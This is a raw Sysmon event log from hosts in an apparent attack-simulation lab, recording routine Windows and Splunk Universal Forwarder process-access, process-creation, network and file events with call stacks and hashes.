11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16AF-6216-F604-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16AF-6216-F604-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-16AF-6216-F604-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.230{4F8D34B0-16AF-6216-F504-000000003902}13323448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16AF-6216-F504-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-16AF-6216-F504-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.011{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16AF-6216-F504-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.012{4F8D34B0-16AF-6216-F504-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:48.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665D2B335CE0A2EE8DE8CEB9D37E29A9,SHA256=31EDCF98AA862D8D2C1107EA81CBB4072FD7A5F41ECA7F0AD3229910A01F7F81,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:45.914{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51600-false10.0.1.12-8089- 23542300x8000000000000000220703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:48.042{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A168A703AE39835CA859E96B0EFE06C9,SHA256=91BFE8F408CC2F967776FED2FB23A2581891A5F73C66F5C5DFC0766726B3A43F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16B1-6216-F804-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:49.886{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 